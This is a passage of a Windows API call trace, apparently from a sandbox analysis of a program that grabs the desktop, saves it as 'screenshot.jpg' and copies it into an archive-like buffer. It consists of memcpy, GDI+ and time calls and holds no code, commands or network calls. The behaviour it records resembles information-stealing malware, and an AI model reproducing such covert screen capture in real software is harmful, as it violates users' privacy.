[0177.179] GlobalLock (hMem=0xee20004) returned 0xfaee6e8 [0177.179] GlobalSize (hMem=0xee20004) returned 0x3fbb0 [0177.179] lstrlenA (lpString="screenshot.jpg") returned 14 [0177.179] StrCmpCA (pszStr1=".jpg", pszStr2=".Z") returned 16 [0177.179] StrCmpCA (pszStr1=".jpg", pszStr2=".zip") returned -16 [0177.179] StrCmpCA (pszStr1=".jpg", pszStr2=".zoo") returned -16 [0177.179] StrCmpCA (pszStr1=".jpg", pszStr2=".arc") returned 9 [0177.179] StrCmpCA (pszStr1=".jpg", pszStr2=".lzh") returned -2 [0177.179] StrCmpCA (pszStr1=".jpg", pszStr2=".arj") returned 9 [0177.180] StrCmpCA (pszStr1=".jpg", pszStr2=".gz") returned 3 [0177.180] StrCmpCA (pszStr1=".jpg", pszStr2=".tgz") returned -10 [0177.180] GetLocalTime (in: lpSystemTime=0x1981e0 | out: lpSystemTime=0x1981e0*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x3, wDay=0x3, wHour=0x13, wMinute=0x20, wSecond=0x28, wMilliseconds=0xfc)) [0177.180] SystemTimeToFileTime (in: lpSystemTime=0x1981e0, lpFileTime=0x1981f8 | out: lpFileTime=0x1981f8) returned 1 [0177.180] FileTimeToSystemTime (in: lpFileTime=0x1981cc, lpSystemTime=0x1981b4 | out: lpSystemTime=0x1981b4) returned 1 [0177.180] memcpy (in: _Dst=0x198720, _Src=0x1985f4, _Size=0x9 | out: _Dst=0x198720) returned 0x198720 [0177.180] memcpy (in: _Dst=0x1fa03cb, _Src=0x1981eb, _Size=0x1 | out: _Dst=0x1fa03cb) returned 0x1fa03cb [0177.180] memcpy (in: _Dst=0x1fa03cc, _Src=0x1981eb, _Size=0x1 | out: _Dst=0x1fa03cc) returned 0x1fa03cc [0177.180] memcpy (in: _Dst=0x1fa03cd, _Src=0x1981ea, _Size=0x1 | out: _Dst=0x1fa03cd) returned 0x1fa03cd [0177.180] memcpy (in: _Dst=0x1fa03ce, _Src=0x1981ea, _Size=0x1 | out: _Dst=0x1fa03ce) returned 0x1fa03ce [0177.180] memcpy (in: _Dst=0x1fa03cf, _Src=0x1981e9, _Size=0x1 | out: _Dst=0x1fa03cf) returned 0x1fa03cf [0177.180] memcpy (in: _Dst=0x1fa03d0, _Src=0x1981e9, _Size=0x1 | out: _Dst=0x1fa03d0) returned 0x1fa03d0 [0177.180] memcpy (in: _Dst=0x1fa03d1, _Src=0x1981e8, _Size=0x1 | out: _Dst=0x1fa03d1) returned 0x1fa03d1 [0177.180] memcpy (in: _Dst=0x1fa03d2, _Src=0x1981e8, _Size=0x1 | out: _Dst=0x1fa03d2) returned 0x1fa03d2 [0177.180] memcpy (in: _Dst=0x1fa03d3, _Src=0x1981e7, _Size=0x1 | out: _Dst=0x1fa03d3) returned 0x1fa03d3 [0177.180] memcpy (in: _Dst=0x1fa03d4, _Src=0x1981e7, _Size=0x1 | out: _Dst=0x1fa03d4) returned 0x1fa03d4 [0177.180] memcpy (in: _Dst=0x1fa03d5, _Src=0x1981e6, _Size=0x1 | out: _Dst=0x1fa03d5) returned 0x1fa03d5 [0177.180] memcpy (in: _Dst=0x1fa03d6, _Src=0x1981e6, _Size=0x1 | out: _Dst=0x1fa03d6) returned 0x1fa03d6 [0177.180] memcpy (in: _Dst=0x1fa03d7, _Src=0x1981e5, _Size=0x1 | out: _Dst=0x1fa03d7) returned 0x1fa03d7 [0177.180] memcpy (in: _Dst=0x1fa03d8, _Src=0x1981e5, _Size=0x1 | out: _Dst=0x1fa03d8) returned 0x1fa03d8 [0177.180] memcpy (in: _Dst=0x1fa03d9, _Src=0x1981e4, _Size=0x1 | out: _Dst=0x1fa03d9) returned 0x1fa03d9 [0177.180] memcpy (in: _Dst=0x1fa03da, _Src=0x1981e4, _Size=0x1 | out: _Dst=0x1fa03da) returned 0x1fa03da [0177.180] memcpy (in: _Dst=0x1fa03db, _Src=0x1981e3, _Size=0x1 | out: _Dst=0x1fa03db) returned 0x1fa03db [0177.180] memcpy (in: _Dst=0x1fa03dc, _Src=0x1981e3, _Size=0x1 | out: _Dst=0x1fa03dc) returned 0x1fa03dc [0177.180] memcpy (in: _Dst=0x1fa03dd, _Src=0x1981e2, _Size=0x1 | out: _Dst=0x1fa03dd) returned 0x1fa03dd [0177.180] memcpy (in: _Dst=0x1fa03de, _Src=0x1981e2, _Size=0x1 | out: _Dst=0x1fa03de) returned 0x1fa03de [0177.180] memcpy (in: _Dst=0x1fa03df, _Src=0x1981e1, _Size=0x1 | out: _Dst=0x1fa03df) returned 0x1fa03df [0177.180] memcpy (in: _Dst=0x1fa03e0, _Src=0x1981e1, _Size=0x1 | out: _Dst=0x1fa03e0) returned 0x1fa03e0 [0177.180] memcpy (in: _Dst=0x1fa03e1, _Src=0x1981e0, _Size=0x1 | out: _Dst=0x1fa03e1) returned 0x1fa03e1 [0177.180] memcpy (in: _Dst=0x1fa03e2, _Src=0x1981e0, _Size=0x1 | out: _Dst=0x1fa03e2) returned 0x1fa03e2 [0177.180] memcpy (in: _Dst=0x1fa03e3, _Src=0x1981df, _Size=0x1 | out: _Dst=0x1fa03e3) returned 0x1fa03e3 [0177.180] memcpy (in: _Dst=0x1fa03e4, _Src=0x1981df, _Size=0x1 | out: _Dst=0x1fa03e4) returned 0x1fa03e4 [0177.180] memcpy (in: _Dst=0x1fa03e5, _Src=0x1981de, _Size=0x1 | out: _Dst=0x1fa03e5) returned 0x1fa03e5 [0177.180] memcpy (in: _Dst=0x1fa03e6, _Src=0x1981de, _Size=0x1 | out: _Dst=0x1fa03e6) returned 0x1fa03e6 [0177.180] memcpy (in: _Dst=0x1fa03e7, _Src=0x1981dd, _Size=0x1 | out: _Dst=0x1fa03e7) returned 0x1fa03e7 [0177.180] memcpy (in: _Dst=0x1fa03e8, _Src=0x1981dd, _Size=0x1 | out: _Dst=0x1fa03e8) returned 0x1fa03e8 [0177.180] memcpy (in: _Dst=0x1fa03e9, _Src=0x1983d8, _Size=0xe | out: _Dst=0x1fa03e9) returned 0x1fa03e9 [0177.180] memcpy (in: _Dst=0x1fa03f7, _Src=0x1985f4, _Size=0x11 | out: _Dst=0x1fa03f7) returned 0x1fa03f7 [0177.181] GetTickCount () returned 0x150e7ec [0177.181] GetDesktopWindow () returned 0x10010 [0177.181] memcpy (in: _Dst=0x5460d0, _Src=0xfaee6e8, _Size=0x10000 | out: _Dst=0x5460d0) returned 0x5460d0 [0177.205] memcpy (in: _Dst=0x1fa0408, _Src=0x4d773c, _Size=0x4000 | out: _Dst=0x1fa0408) returned 0x1fa0408 [0177.206] memcpy (in: _Dst=0x1fa4408, _Src=0x4d773c, _Size=0x4000 | out: _Dst=0x1fa4408) returned 0x1fa4408 [0177.208] memcpy (in: _Dst=0x5460d0, _Src=0x54e0d0, _Size=0x8000 | out: _Dst=0x5460d0) returned 0x5460d0 [0177.209] memcpy (in: _Dst=0x54e0d0, _Src=0xfafe6e8, _Size=0x8000 | out: _Dst=0x54e0d0) returned 0x54e0d0 [0177.209] memcpy (in: _Dst=0x1fa8408, _Src=0x4d773c, _Size=0x91 | out: _Dst=0x1fa8408) returned 0x1fa8408 [0177.209] memcpy (in: _Dst=0x1fa8499, _Src=0x4d773c, _Size=0x4 | out: _Dst=0x1fa8499) returned 0x1fa8499 [0177.209] memcpy (in: _Dst=0x1fa849d, _Src=0x5461ff, _Size=0x8051 | out: _Dst=0x1fa849d) returned 0x1fa849d [0177.213] memcpy (in: _Dst=0x5460d0, _Src=0x54e0d0, _Size=0x8000 | out: _Dst=0x5460d0) returned 0x5460d0 [0177.218] memcpy (in: _Dst=0x54e0d0, _Src=0xfb066e8, _Size=0x8000 | out: _Dst=0x54e0d0) returned 0x54e0d0 [0177.219] memcpy (in: _Dst=0x1fb04ee, _Src=0x4d773c, _Size=0x1 | out: _Dst=0x1fb04ee) returned 0x1fb04ee [0177.219] memcpy (in: _Dst=0x1fb04ef, _Src=0x4d773c, _Size=0x4 | out: _Dst=0x1fb04ef) returned 0x1fb04ef [0177.219] memcpy (in: _Dst=0x1fb04f3, _Src=0x546250, _Size=0x805d | out: _Dst=0x1fb04f3) returned 0x1fb04f3 [0177.223] memcpy (in: _Dst=0x5460d0, _Src=0x54e0d0, _Size=0x8000 | out: _Dst=0x5460d0) returned 0x5460d0 [0177.223] memcpy (in: _Dst=0x54e0d0, _Src=0xfb0e6e8, _Size=0x8000 | out: _Dst=0x54e0d0) returned 0x54e0d0 [0177.224] memcpy (in: _Dst=0x1fb8550, _Src=0x4d773c, _Size=0x1 | out: _Dst=0x1fb8550) returned 0x1fb8550 [0177.224] memcpy (in: _Dst=0x1fb8551, _Src=0x4d773c, _Size=0x4 | out: _Dst=0x1fb8551) returned 0x1fb8551 [0177.224] memcpy (in: _Dst=0x1fb8555, _Src=0x5462ad, _Size=0x804b | out: _Dst=0x1fb8555) returned 0x1fb8555 [0177.226] memcpy (in: _Dst=0x5460d0, _Src=0x54e0d0, _Size=0x8000 | out: _Dst=0x5460d0) returned 0x5460d0 [0177.227] memcpy (in: _Dst=0x54e0d0, _Src=0xfb166e8, _Size=0x8000 | out: _Dst=0x54e0d0) returned 0x54e0d0 [0177.227] memcpy (in: _Dst=0x1fc05a0, _Src=0x4d773c, _Size=0x1 | out: _Dst=0x1fc05a0) returned 0x1fc05a0 [0177.227] memcpy (in: _Dst=0x1fc05a1, _Src=0x4d773c, _Size=0x4 | out: _Dst=0x1fc05a1) returned 0x1fc05a1 [0177.227] memcpy (in: _Dst=0x1fc05a5, _Src=0x5462f8, _Size=0x804c | out: _Dst=0x1fc05a5) returned 0x1fc05a5 [0177.232] memcpy (in: _Dst=0x5460d0, _Src=0x54e0d0, _Size=0x8000 | out: _Dst=0x5460d0) returned 0x5460d0 [0177.232] memcpy (in: _Dst=0x54e0d0, _Src=0xfb1e6e8, _Size=0x8000 | out: _Dst=0x54e0d0) returned 0x54e0d0 [0177.233] memcpy (in: _Dst=0x1fc85f1, _Src=0x4d773c, _Size=0x1 | out: _Dst=0x1fc85f1) returned 0x1fc85f1 [0177.233] memcpy (in: _Dst=0x1fc85f2, _Src=0x4d773c, _Size=0x4 | out: _Dst=0x1fc85f2) returned 0x1fc85f2 [0177.233] memcpy (in: _Dst=0x1fc85f6, _Src=0x546344, _Size=0x8058 | out: _Dst=0x1fc85f6) returned 0x1fc85f6 [0177.234] memcpy (in: _Dst=0x5460d0, _Src=0x54e0d0, _Size=0x8000 | out: _Dst=0x5460d0) returned 0x5460d0 [0177.235] memcpy (in: _Dst=0x54e0d0, _Src=0xfb266e8, _Size=0x7bb0 | out: _Dst=0x54e0d0) returned 0x54e0d0 [0177.235] memcpy (in: _Dst=0x1fd064e, _Src=0x4d773c, _Size=0x1 | out: _Dst=0x1fd064e) returned 0x1fd064e [0177.235] memcpy (in: _Dst=0x1fd064f, _Src=0x4d773c, _Size=0x4 | out: _Dst=0x1fd064f) returned 0x1fd064f [0177.235] memcpy (in: _Dst=0x1fd0653, _Src=0x54639c, _Size=0x8054 | out: _Dst=0x1fd0653) returned 0x1fd0653 [0177.238] memcpy (in: _Dst=0x1fd86a7, _Src=0x4d773c, _Size=0x4000 | out: _Dst=0x1fd86a7) returned 0x1fd86a7 [0177.238] memcpy (in: _Dst=0x1fdc6a7, _Src=0x4d773c, _Size=0x379b | out: _Dst=0x1fdc6a7) returned 0x1fdc6a7 [0177.238] memcpy (in: _Dst=0x1fa03cb, _Src=0x1981eb, _Size=0x1 | out: _Dst=0x1fa03cb) returned 0x1fa03cb [0177.238] memcpy (in: _Dst=0x1fa03cc, _Src=0x1981eb, _Size=0x1 | out: _Dst=0x1fa03cc) returned 0x1fa03cc [0177.238] memcpy (in: _Dst=0x1fa03cd, _Src=0x1981ea, _Size=0x1 | out: _Dst=0x1fa03cd) returned 0x1fa03cd [0177.238] memcpy (in: _Dst=0x1fa03ce, _Src=0x1981ea, _Size=0x1 | out: _Dst=0x1fa03ce) returned 0x1fa03ce [0177.238] memcpy (in: _Dst=0x1fa03cf, _Src=0x1981e9, _Size=0x1 | out: _Dst=0x1fa03cf) returned 0x1fa03cf [0177.238] memcpy (in: _Dst=0x1fa03d0, _Src=0x1981e9, _Size=0x1 | out: _Dst=0x1fa03d0) returned 0x1fa03d0 [0177.238] memcpy (in: _Dst=0x1fa03d1, _Src=0x1981e8, _Size=0x1 | out: _Dst=0x1fa03d1) returned 0x1fa03d1 [0177.238] memcpy (in: _Dst=0x1fa03d2, _Src=0x1981e8, _Size=0x1 | out: _Dst=0x1fa03d2) returned 0x1fa03d2 [0177.238] memcpy (in: _Dst=0x1fa03d3, _Src=0x1981e7, _Size=0x1 | out: _Dst=0x1fa03d3) returned 0x1fa03d3 [0177.238] memcpy (in: _Dst=0x1fa03d4, _Src=0x1981e7, _Size=0x1 | out: _Dst=0x1fa03d4) returned 0x1fa03d4 [0177.238] memcpy (in: _Dst=0x1fa03d5, _Src=0x1981e6, _Size=0x1 | out: _Dst=0x1fa03d5) returned 0x1fa03d5 [0177.238] memcpy (in: _Dst=0x1fa03d6, _Src=0x1981e6, _Size=0x1 | out: _Dst=0x1fa03d6) returned 0x1fa03d6 [0177.238] memcpy (in: _Dst=0x1fa03d7, _Src=0x1981e5, _Size=0x1 | out: _Dst=0x1fa03d7) returned 0x1fa03d7 [0177.239] memcpy (in: _Dst=0x1fa03d8, _Src=0x1981e5, _Size=0x1 | out: _Dst=0x1fa03d8) returned 0x1fa03d8 [0177.239] memcpy (in: _Dst=0x1fa03d9, _Src=0x1981e4, _Size=0x1 | out: _Dst=0x1fa03d9) returned 0x1fa03d9 [0177.239] memcpy (in: _Dst=0x1fa03da, _Src=0x1981e4, _Size=0x1 | out: _Dst=0x1fa03da) returned 0x1fa03da [0177.239] memcpy (in: _Dst=0x1fa03db, _Src=0x1981e3, _Size=0x1 | out: _Dst=0x1fa03db) returned 0x1fa03db [0177.239] memcpy (in: _Dst=0x1fa03dc, _Src=0x1981e3, _Size=0x1 | out: _Dst=0x1fa03dc) returned 0x1fa03dc [0177.239] memcpy (in: _Dst=0x1fa03dd, _Src=0x1981e2, _Size=0x1 | out: _Dst=0x1fa03dd) returned 0x1fa03dd [0177.239] memcpy (in: _Dst=0x1fa03de, _Src=0x1981e2, _Size=0x1 | out: _Dst=0x1fa03de) returned 0x1fa03de [0177.239] memcpy (in: _Dst=0x1fa03df, _Src=0x1981e1, _Size=0x1 | out: _Dst=0x1fa03df) returned 0x1fa03df [0177.239] memcpy (in: _Dst=0x1fa03e0, _Src=0x1981e1, _Size=0x1 | out: _Dst=0x1fa03e0) returned 0x1fa03e0 [0177.239] memcpy (in: _Dst=0x1fa03e1, _Src=0x1981e0, _Size=0x1 | out: _Dst=0x1fa03e1) returned 0x1fa03e1 [0177.239] memcpy (in: _Dst=0x1fa03e2, _Src=0x1981e0, _Size=0x1 | out: _Dst=0x1fa03e2) returned 0x1fa03e2 [0177.239] memcpy (in: _Dst=0x1fa03e3, _Src=0x1981df, _Size=0x1 | out: _Dst=0x1fa03e3) returned 0x1fa03e3 [0177.239] memcpy (in: _Dst=0x1fa03e4, _Src=0x1981df, _Size=0x1 | out: _Dst=0x1fa03e4) returned 0x1fa03e4 [0177.239] memcpy (in: _Dst=0x1fa03e5, _Src=0x1981de, _Size=0x1 | out: _Dst=0x1fa03e5) returned 0x1fa03e5 [0177.239] memcpy (in: _Dst=0x1fa03e6, _Src=0x1981de, _Size=0x1 | out: _Dst=0x1fa03e6) returned 0x1fa03e6 [0177.239] memcpy (in: _Dst=0x1fa03e7, _Src=0x1981dd, _Size=0x1 | out: _Dst=0x1fa03e7) returned 0x1fa03e7 [0177.239] memcpy (in: _Dst=0x1fa03e8, _Src=0x1981dd, _Size=0x1 | out: _Dst=0x1fa03e8) returned 0x1fa03e8 [0177.239] memcpy (in: _Dst=0x1fa03e9, _Src=0x1983d8, _Size=0xe | out: _Dst=0x1fa03e9) returned 0x1fa03e9 [0177.239] memcpy (in: _Dst=0x1fa03f7, _Src=0x1985f4, _Size=0x11 | out: _Dst=0x1fa03f7) returned 0x1fa03f7 [0177.239] GetProcessHeap () returned 0x4c0000 [0177.239] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x9) returned 0x4f97e8 [0177.239] memcpy (in: _Dst=0x4f97e8, _Src=0x198720, _Size=0x9 | out: _Dst=0x4f97e8) returned 0x4f97e8 [0177.239] GetProcessHeap () returned 0x4c0000 [0177.239] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x360) returned 0x529b08 [0177.239] memcpy (in: _Dst=0x529b08, _Src=0x198290, _Size=0x360 | out: _Dst=0x529b08) returned 0x529b08 [0177.239] SelectObject (hdc=0x3001099a, h=0x185000f) returned 0x46050972 [0177.239] GdipDisposeImage (image=0xee11f08) returned 0x0 [0177.315] GdiplusShutdown (token=0x150cc46) [0177.328] DeleteObject (ho=0x46050972) returned 1 [0177.328] DeleteObject (ho=0x3001099a) returned 1 [0177.328] ReleaseDC (hWnd=0x10010, hDC=0xa0100d0) returned 1 [0177.332] CloseWindow (hWnd=0x10010) returned 1 [0177.332] memcpy (in: _Dst=0x1fdfe42, _Src=0x19878f, _Size=0x1 | out: _Dst=0x1fdfe42) returned 0x1fdfe42 [0177.332] memcpy (in: _Dst=0x1fdfe43, _Src=0x19878f, _Size=0x1 | out: _Dst=0x1fdfe43) returned 0x1fdfe43 [0177.332] memcpy (in: _Dst=0x1fdfe44, _Src=0x19878e, _Size=0x1 | out: _Dst=0x1fdfe44) returned 0x1fdfe44 [0177.332] memcpy (in: _Dst=0x1fdfe45, _Src=0x19878e, _Size=0x1 | out: _Dst=0x1fdfe45) returned 0x1fdfe45 [0177.332] memcpy (in: _Dst=0x1fdfe46, _Src=0x19878d, _Size=0x1 | out: _Dst=0x1fdfe46) returned 0x1fdfe46 [0177.332] memcpy (in: _Dst=0x1fdfe47, _Src=0x19878d, _Size=0x1 | out: _Dst=0x1fdfe47) returned 0x1fdfe47 [0177.332] memcpy (in: _Dst=0x1fdfe48, _Src=0x19878c, _Size=0x1 | out: _Dst=0x1fdfe48) returned 0x1fdfe48 [0177.332] memcpy (in: _Dst=0x1fdfe49, _Src=0x19878c, _Size=0x1 | out: _Dst=0x1fdfe49) returned 0x1fdfe49 [0177.332] memcpy (in: _Dst=0x1fdfe4a, _Src=0x19878b, _Size=0x1 | out: _Dst=0x1fdfe4a) returned 0x1fdfe4a [0177.332] memcpy (in: _Dst=0x1fdfe4b, _Src=0x19878b, _Size=0x1 | out: _Dst=0x1fdfe4b) returned 0x1fdfe4b [0177.332] memcpy (in: _Dst=0x1fdfe4c, _Src=0x19878a, _Size=0x1 | out: _Dst=0x1fdfe4c) returned 0x1fdfe4c [0177.332] memcpy (in: _Dst=0x1fdfe4d, _Src=0x19878a, _Size=0x1 | out: _Dst=0x1fdfe4d) returned 0x1fdfe4d [0177.332] memcpy (in: _Dst=0x1fdfe4e, _Src=0x198789, _Size=0x1 | out: _Dst=0x1fdfe4e) returned 0x1fdfe4e [0177.332] memcpy (in: _Dst=0x1fdfe4f, _Src=0x198789, _Size=0x1 | out: _Dst=0x1fdfe4f) returned 0x1fdfe4f [0177.332] memcpy (in: _Dst=0x1fdfe50, _Src=0x198788, _Size=0x1 | out: _Dst=0x1fdfe50) returned 0x1fdfe50 [0177.332] memcpy (in: _Dst=0x1fdfe51, _Src=0x198788, _Size=0x1 | out: _Dst=0x1fdfe51) returned 0x1fdfe51 [0177.332] memcpy (in: _Dst=0x1fdfe52, _Src=0x198787, _Size=0x1 | out: _Dst=0x1fdfe52) returned 0x1fdfe52 [0177.332] memcpy (in: _Dst=0x1fdfe53, _Src=0x198787, _Size=0x1 | out: _Dst=0x1fdfe53) returned 0x1fdfe53 [0177.332] memcpy (in: _Dst=0x1fdfe54, _Src=0x198786, _Size=0x1 | out: _Dst=0x1fdfe54) returned 0x1fdfe54 [0177.332] memcpy (in: _Dst=0x1fdfe55, _Src=0x198786, _Size=0x1 | out: _Dst=0x1fdfe55) returned 0x1fdfe55 [0177.332] memcpy (in: _Dst=0x1fdfe56, _Src=0x198785, _Size=0x1 | out: _Dst=0x1fdfe56) returned 0x1fdfe56 [0177.332] memcpy (in: _Dst=0x1fdfe57, _Src=0x198785, _Size=0x1 | out: _Dst=0x1fdfe57) returned 0x1fdfe57 [0177.332] memcpy (in: _Dst=0x1fdfe58, _Src=0x198784, _Size=0x1 | out: _Dst=0x1fdfe58) returned 0x1fdfe58 [0177.333] memcpy (in: _Dst=0x1fdfe59, _Src=0x198784, _Size=0x1 | out: _Dst=0x1fdfe59) returned 0x1fdfe59 [0177.333] memcpy (in: _Dst=0x1fdfe5a, _Src=0x198783, _Size=0x1 | out: _Dst=0x1fdfe5a) returned 0x1fdfe5a [0177.333] memcpy (in: _Dst=0x1fdfe5b, _Src=0x198783, _Size=0x1 | out: _Dst=0x1fdfe5b) returned 0x1fdfe5b [0177.333] memcpy (in: _Dst=0x1fdfe5c, _Src=0x198782, _Size=0x1 | out: _Dst=0x1fdfe5c) returned 0x1fdfe5c [0177.333] memcpy (in: _Dst=0x1fdfe5d, _Src=0x198782, _Size=0x1 | out: _Dst=0x1fdfe5d) returned 0x1fdfe5d [0177.333] memcpy (in: _Dst=0x1fdfe5e, _Src=0x198781, _Size=0x1 | out: _Dst=0x1fdfe5e) returned 0x1fdfe5e [0177.333] memcpy (in: _Dst=0x1fdfe5f, _Src=0x198781, _Size=0x1 | out: _Dst=0x1fdfe5f) returned 0x1fdfe5f [0177.333] memcpy (in: _Dst=0x1fdfe60, _Src=0x198780, _Size=0x1 | out: _Dst=0x1fdfe60) returned 0x1fdfe60 [0177.333] memcpy (in: _Dst=0x1fdfe61, _Src=0x198780, _Size=0x1 | out: _Dst=0x1fdfe61) returned 0x1fdfe61 [0177.333] memcpy (in: _Dst=0x1fdfe62, _Src=0x19877f, _Size=0x1 | out: _Dst=0x1fdfe62) returned 0x1fdfe62 [0177.333] memcpy (in: _Dst=0x1fdfe63, _Src=0x19877f, _Size=0x1 | out: _Dst=0x1fdfe63) returned 0x1fdfe63 [0177.333] memcpy (in: _Dst=0x1fdfe64, _Src=0x19877e, _Size=0x1 | out: _Dst=0x1fdfe64) returned 0x1fdfe64 [0177.333] memcpy (in: _Dst=0x1fdfe65, _Src=0x19877e, _Size=0x1 | out: _Dst=0x1fdfe65) returned 0x1fdfe65 [0177.333] memcpy (in: _Dst=0x1fdfe66, _Src=0x19877d, _Size=0x1 | out: _Dst=0x1fdfe66) returned 0x1fdfe66 [0177.333] memcpy (in: _Dst=0x1fdfe67, _Src=0x19877d, _Size=0x1 | out: _Dst=0x1fdfe67) returned 0x1fdfe67 [0177.333] memcpy (in: _Dst=0x1fdfe68, _Src=0x19877c, _Size=0x1 | out: _Dst=0x1fdfe68) returned 0x1fdfe68 [0177.333] memcpy (in: _Dst=0x1fdfe69, _Src=0x19877c, _Size=0x1 | out: _Dst=0x1fdfe69) returned 0x1fdfe69 [0177.333] memcpy (in: _Dst=0x1fdfe6a, _Src=0x19877b, _Size=0x1 | out: _Dst=0x1fdfe6a) returned 0x1fdfe6a [0177.333] memcpy (in: _Dst=0x1fdfe6b, _Src=0x19877b, _Size=0x1 | out: _Dst=0x1fdfe6b) returned 0x1fdfe6b [0177.333] memcpy (in: _Dst=0x1fdfe6c, _Src=0x19877a, _Size=0x1 | out: _Dst=0x1fdfe6c) returned 0x1fdfe6c [0177.333] memcpy (in: _Dst=0x1fdfe6d, _Src=0x19877a, _Size=0x1 | out: _Dst=0x1fdfe6d) returned 0x1fdfe6d [0177.333] memcpy (in: _Dst=0x1fdfe6e, _Src=0x198779, _Size=0x1 | out: _Dst=0x1fdfe6e) returned 0x1fdfe6e [0177.333] memcpy (in: _Dst=0x1fdfe6f, _Src=0x198779, _Size=0x1 | out: _Dst=0x1fdfe6f) returned 0x1fdfe6f [0177.333] memcpy (in: _Dst=0x1fdfe70, _Src=0x5290f0, _Size=0xa | out: _Dst=0x1fdfe70) returned 0x1fdfe70 [0177.333] memcpy (in: _Dst=0x1fdfe7a, _Src=0x4f97a0, _Size=0x9 | out: _Dst=0x1fdfe7a) returned 0x1fdfe7a [0177.333] memcpy (in: _Dst=0x1fdfe83, _Src=0x19878f, _Size=0x1 | out: _Dst=0x1fdfe83) returned 0x1fdfe83 [0177.333] memcpy (in: _Dst=0x1fdfe84, _Src=0x19878f, _Size=0x1 | out: _Dst=0x1fdfe84) returned 0x1fdfe84 [0177.333] memcpy (in: _Dst=0x1fdfe85, _Src=0x19878e, _Size=0x1 | out: _Dst=0x1fdfe85) returned 0x1fdfe85 [0177.333] memcpy (in: _Dst=0x1fdfe86, _Src=0x19878e, _Size=0x1 | out: _Dst=0x1fdfe86) returned 0x1fdfe86 [0177.333] memcpy (in: _Dst=0x1fdfe87, _Src=0x19878d, _Size=0x1 | out: _Dst=0x1fdfe87) returned 0x1fdfe87 [0177.333] memcpy (in: _Dst=0x1fdfe88, _Src=0x19878d, _Size=0x1 | out: _Dst=0x1fdfe88) returned 0x1fdfe88 [0177.333] memcpy (in: _Dst=0x1fdfe89, _Src=0x19878c, _Size=0x1 | out: _Dst=0x1fdfe89) returned 0x1fdfe89 [0177.333] memcpy (in: _Dst=0x1fdfe8a, _Src=0x19878c, _Size=0x1 | out: _Dst=0x1fdfe8a) returned 0x1fdfe8a [0177.333] memcpy (in: _Dst=0x1fdfe8b, _Src=0x19878b, _Size=0x1 | out: _Dst=0x1fdfe8b) returned 0x1fdfe8b [0177.333] memcpy (in: _Dst=0x1fdfe8c, _Src=0x19878b, _Size=0x1 | out: _Dst=0x1fdfe8c) returned 0x1fdfe8c [0177.333] memcpy (in: _Dst=0x1fdfe8d, _Src=0x19878a, _Size=0x1 | out: _Dst=0x1fdfe8d) returned 0x1fdfe8d [0177.334] memcpy (in: _Dst=0x1fdfe8e, _Src=0x19878a, _Size=0x1 | out: _Dst=0x1fdfe8e) returned 0x1fdfe8e [0177.334] memcpy (in: _Dst=0x1fdfe8f, _Src=0x198789, _Size=0x1 | out: _Dst=0x1fdfe8f) returned 0x1fdfe8f [0177.334] memcpy (in: _Dst=0x1fdfe90, _Src=0x198789, _Size=0x1 | out: _Dst=0x1fdfe90) returned 0x1fdfe90 [0177.334] memcpy (in: _Dst=0x1fdfe91, _Src=0x198788, _Size=0x1 | out: _Dst=0x1fdfe91) returned 0x1fdfe91 [0177.334] memcpy (in: _Dst=0x1fdfe92, _Src=0x198788, _Size=0x1 | out: _Dst=0x1fdfe92) returned 0x1fdfe92 [0177.334] memcpy (in: _Dst=0x1fdfe93, _Src=0x198787, _Size=0x1 | out: _Dst=0x1fdfe93) returned 0x1fdfe93 [0177.334] memcpy (in: _Dst=0x1fdfe94, _Src=0x198787, _Size=0x1 | out: _Dst=0x1fdfe94) returned 0x1fdfe94 [0177.334] memcpy (in: _Dst=0x1fdfe95, _Src=0x198786, _Size=0x1 | out: _Dst=0x1fdfe95) returned 0x1fdfe95 [0177.334] memcpy (in: _Dst=0x1fdfe96, _Src=0x198786, _Size=0x1 | out: _Dst=0x1fdfe96) returned 0x1fdfe96 [0177.334] memcpy (in: _Dst=0x1fdfe97, _Src=0x198785, _Size=0x1 | out: _Dst=0x1fdfe97) returned 0x1fdfe97 [0177.334] memcpy (in: _Dst=0x1fdfe98, _Src=0x198785, _Size=0x1 | out: _Dst=0x1fdfe98) returned 0x1fdfe98 [0177.334] memcpy (in: _Dst=0x1fdfe99, _Src=0x198784, _Size=0x1 | out: _Dst=0x1fdfe99) returned 0x1fdfe99 [0177.334] memcpy (in: _Dst=0x1fdfe9a, _Src=0x198784, _Size=0x1 | out: _Dst=0x1fdfe9a) returned 0x1fdfe9a [0177.334] memcpy (in: _Dst=0x1fdfe9b, _Src=0x198783, _Size=0x1 | out: _Dst=0x1fdfe9b) returned 0x1fdfe9b [0177.334] memcpy (in: _Dst=0x1fdfe9c, _Src=0x198783, _Size=0x1 | out: _Dst=0x1fdfe9c) returned 0x1fdfe9c [0177.334] memcpy (in: _Dst=0x1fdfe9d, _Src=0x198782, _Size=0x1 | out: _Dst=0x1fdfe9d) returned 0x1fdfe9d [0177.334] memcpy (in: _Dst=0x1fdfe9e, _Src=0x198782, _Size=0x1 | out: _Dst=0x1fdfe9e) returned 0x1fdfe9e [0177.334] memcpy (in: _Dst=0x1fdfe9f, _Src=0x198781, _Size=0x1 | out: _Dst=0x1fdfe9f) returned 0x1fdfe9f [0177.334] memcpy (in: _Dst=0x1fdfea0, _Src=0x198781, _Size=0x1 | out: _Dst=0x1fdfea0) returned 0x1fdfea0 [0177.334] memcpy (in: _Dst=0x1fdfea1, _Src=0x198780, _Size=0x1 | out: _Dst=0x1fdfea1) returned 0x1fdfea1 [0177.334] memcpy (in: _Dst=0x1fdfea2, _Src=0x198780, _Size=0x1 | out: _Dst=0x1fdfea2) returned 0x1fdfea2 [0177.334] memcpy (in: _Dst=0x1fdfea3, _Src=0x19877f, _Size=0x1 | out: _Dst=0x1fdfea3) returned 0x1fdfea3 [0177.334] memcpy (in: _Dst=0x1fdfea4, _Src=0x19877f, _Size=0x1 | out: _Dst=0x1fdfea4) returned 0x1fdfea4 [0177.334] memcpy (in: _Dst=0x1fdfea5, _Src=0x19877e, _Size=0x1 | out: _Dst=0x1fdfea5) returned 0x1fdfea5 [0177.334] memcpy (in: _Dst=0x1fdfea6, _Src=0x19877e, _Size=0x1 | out: _Dst=0x1fdfea6) returned 0x1fdfea6 [0177.334] memcpy (in: _Dst=0x1fdfea7, _Src=0x19877d, _Size=0x1 | out: _Dst=0x1fdfea7) returned 0x1fdfea7 [0177.334] memcpy (in: _Dst=0x1fdfea8, _Src=0x19877d, _Size=0x1 | out: 